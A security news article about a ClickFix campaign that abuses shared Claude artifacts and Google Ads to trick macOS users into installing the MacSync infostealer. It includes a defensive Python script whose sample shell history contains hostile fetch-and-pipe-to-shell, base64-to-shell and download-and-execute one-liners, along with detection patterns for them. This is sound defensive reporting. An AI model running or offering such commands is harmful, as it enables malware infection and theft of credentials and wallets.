ClickFix Attack Exploits Claude LLM Artifacts to Distribute Mac Infostealers


Malicious Actors Exploit Claude LLM Artifacts to Deliver Mac Infostealers

A recent campaign has been discovered that leverages Claude LLM artifacts and Google Ads to distribute infostealer malware to macOS users. The attackers target users who search for specific technical queries, including "online DNS resolver", "macOS CLI disk space analyzer", and "Homebrew".

Malicious Activity Involves Claude Artifacts

The malicious activity involves the use of Claude artifacts, which are pieces of content generated by Anthropic's LLM that are publicly accessible via share links hosted on the claude.ai domain. These artifacts can contain instructions, guides, code snippets, or other types of output that are isolated from the main chat. Because the artifact is served from claude.ai, an attacker-authored set of instructions inherits the appearance of a legitimate, well-known domain. The pages hosting these artifacts do explicitly warn users that the content has not been verified for accuracy, but that warning is easy to overlook when the page looks like an ordinary how-to guide.

Attack Variants and Malware Delivery

Researchers at MacPaw's Moonlock Lab and ad-blocking company AdGuard have identified at least two variants of the malicious campaign. In both cases, the attackers use Google Ads to place sponsored search results that lead to either a public Claude artifact or a Medium article impersonating Apple Support. The user is then instructed to paste a shell command into Terminal, which ultimately leads to the installation of the MacSync infostealer malware.

The first variant of the attack uses a command that, when executed, fetches a malware loader from a hardcoded URL. The second variant routes the victim through the fake Apple Support page before delivering the malware. In both cases, the malware establishes communication with a command-and-control (C2) infrastructure using a hardcoded token and API key, and spoofs a macOS browser user-agent so that its traffic blends in with ordinary browser requests.
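The common step in both variants is a pasted Terminal one-liner that fetches a loader from a remote URL and runs it. The following is an added example, not code from the article or from Moonlock Lab or AdGuard, showing how an analyst might sweep a macOS shell history for commands of that shape. It parses both plain and zsh extended-history (`: <timestamp>:<elapsed>;<command>`) lines, flags the generic "fetch and execute" patterns a ClickFix lure needs (the indicator names and regexes are this example's own heuristics, not indicators published for this campaign), and pulls out any URLs so the analyst can pivot on the hardcoded loader address the article mentions. The sample history is constructed and uses the reserved `example.invalid` domain.

```python
"""Heuristic sweep of a macOS shell history for ClickFix-style one-liners.

Added example, not the article's or the researchers' code. The campaign's
actual commands are not reproduced; the indicators below are generic
"fetch something remote and execute it" shapes.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Each indicator is (label, compiled regex). Labels are this example's own.
INDICATORS = [
    # curl/wget output piped straight into sh/bash/zsh, e.g. curl -fsSL URL | bash
    ("remote_fetch_to_interpreter",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|)sh\b")),
    # base64-obfuscated payload decoded and piped into a shell
    ("base64_decode_to_interpreter",
     re.compile(r"base64\s+(-d|--decode|-D)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|)sh\b")),
    # download, mark executable and run in one line
    ("fetch_then_chmod_exec",
     re.compile(r"\b(curl|wget)\b.*(&&|;)\s*chmod\s+\+x")),
    # process substitution variant, e.g. bash <(curl -s URL)
    ("process_substitution_fetch",
     re.compile(r"\b(ba|z|)sh\s+<\(\s*(curl|wget)\b")),
]

URL_RE = re.compile(r"https?://[^\s'\"|;&)<>]+")
# zsh EXTENDED_HISTORY format: ": 1736000000:0;command"
ZSH_EXT = re.compile(r"^: (\d+):\d+;(.*)$")


@dataclass
class Finding:
    line_no: int
    command: str
    indicators: List[str]
    urls: List[str] = field(default_factory=list)
    timestamp: Optional[int] = None


def parse_history_line(raw: str) -> Tuple[Optional[int], str]:
    """Return (epoch timestamp or None, command) for one history line."""
    m = ZSH_EXT.match(raw)
    if m:
        return int(m.group(1)), m.group(2)
    return None, raw


def classify_command(cmd: str) -> List[str]:
    """Labels of every indicator that matches the command, in list order."""
    return [label for label, rx in INDICATORS if rx.search(cmd)]


def scan_history(lines: List[str]) -> List[Finding]:
    """Flag history entries matching at least one indicator."""
    findings = []
    for n, raw in enumerate(lines, 1):
        raw = raw.rstrip("\n")
        if not raw:
            continue
        ts, cmd = parse_history_line(raw)
        hits = classify_command(cmd)
        if hits:
            findings.append(Finding(n, cmd, hits, URL_RE.findall(cmd), ts))
    return findings


# Constructed sample history: benign admin commands mixed with three lures.
SAMPLE_HISTORY = [
    ": 1736000000:0;brew install ncdu",
    ": 1736000060:0;curl -fsSL https://example.invalid/setup.sh | bash",
    ": 1736000120:0;echo aGVsbG8= | base64 --decode | sh",
    ": 1736000180:0;curl -o /tmp/updater https://example.invalid/u && chmod +x /tmp/updater && /tmp/updater",
    ": 1736000240:0;ls -la ~/Library/LaunchAgents",
    "dig @1.1.1.1 example.com",  # plain (non-extended) history line
]


if __name__ == "__main__":
    # Real use: scan_history(open(os.path.expanduser("~/.zsh_history")).readlines())
    for f in scan_history(SAMPLE_HISTORY):
        print(f"line {f.line_no} ts={f.timestamp} {f.indicators} urls={f.urls}")
        print(f"    {f.command}")
```

On a real host the same function can be pointed at `~/.zsh_history` or `~/.bash_history`; the timestamp from zsh extended history gives the analyst a time to correlate with the network connection to the loader URL.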

Malware Capabilities and Data Exfiltration

Once installed, the MacSync infostealer malware exfiltrates sensitive information from the system, including keychain data, browser data, and crypto wallets. The stolen data is packaged into an archive and exfiltrated to the attacker's C2 server via an HTTP POST request.

Researcher Observations and Recommendations

Researchers have observed that both variants of the attack fetch the second stage of the malware from the same C2 address, suggesting that the same threat actor is behind both. This is not the first time that large language models (LLMs) have been abused in ClickFix attacks: a similar campaign discovered in December 2025 leveraged the chat sharing feature in ChatGPT and Grok to deliver the AMOS infostealer.

The use of Claude LLM artifacts in this campaign highlights the expanding abuse of LLMs by threat actors. Users are advised to exercise caution when searching for technical information online and to verify the authenticity of any instructions or guides before following them. In particular, a command that should be pasted into Terminal and that downloads and runs something from a URL deserves scrutiny regardless of the domain hosting the instructions: save the script to a file and read it before executing it, rather than piping it straight into a shell.
